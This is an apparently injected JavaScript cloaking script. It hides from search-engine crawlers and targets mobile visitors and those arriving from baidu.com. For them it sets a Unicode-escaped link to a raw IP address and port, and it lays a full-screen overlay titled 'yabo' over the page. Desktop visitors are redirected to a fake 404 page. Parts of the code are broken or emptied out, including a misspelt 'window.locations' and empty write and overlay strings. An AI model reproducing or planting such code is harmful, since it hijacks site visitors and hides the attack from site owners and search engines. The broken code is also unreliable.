var s=document.referrer;
var host=window.locations.host;
var p = navigator.platform;
var reg = /(Baiduspider|360Spider|YisouSpider|YandexBot|Sogou inst spider|Sogou web spider|spider|Baiduspider-render)/i;
if (!reg.test(navigator.userAgent)) {
let flag = navigator.userAgent.match(/(phones|pad|pod|iphoness|ipods|ioses|ipads|androids|mobiles|BlackBerry|IEmobiles|MQQBrowser|QQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|weboses|Symbian|Windows phones)/i);
if ( ! /Win/i.test(navigator.platform) && ! /Mac/i.test(navigator.platform) ) {
var _src = '\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0031\u0030\u0034\u002e\u0032\u0033\u0033\u002e\u0031\u0034\u0035\u002e\u0034\u0034\u003a\u0033\u0039\u0033\u0039\u0033';
} else if (s.indexOf("baidu.com") > -1 )
{ _src = '\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0031\u0030\u0034\u002e\u0032\u0033\u0033\u002e\u0031\u0034\u0035\u002e\u0034\u0034\u003a\u0033\u0039\u0033\u0039\u0033';
}
else {
// PC
window.locations.href = '/fn404.htm';
}
document.write('');
var hd = document.head;
var styleCSS = document.createElement('style'), yabo = document.createElement('div');
styleCSS.innerHTML = 'html,body{position:relative;width:auto !important;height:100% !important;min-width:auto !important;overflow:hidden;}.yabo{position:fixed;top:0;left:0;right:0;height:100%;z-index:9999999999;background:#fff;}';
yabo.setAttribute('class', 'yabo');
yabo.innerHTML = '';
hd.appendChild(styleCSS);
hd.parentNode.appendChild(yabo);
}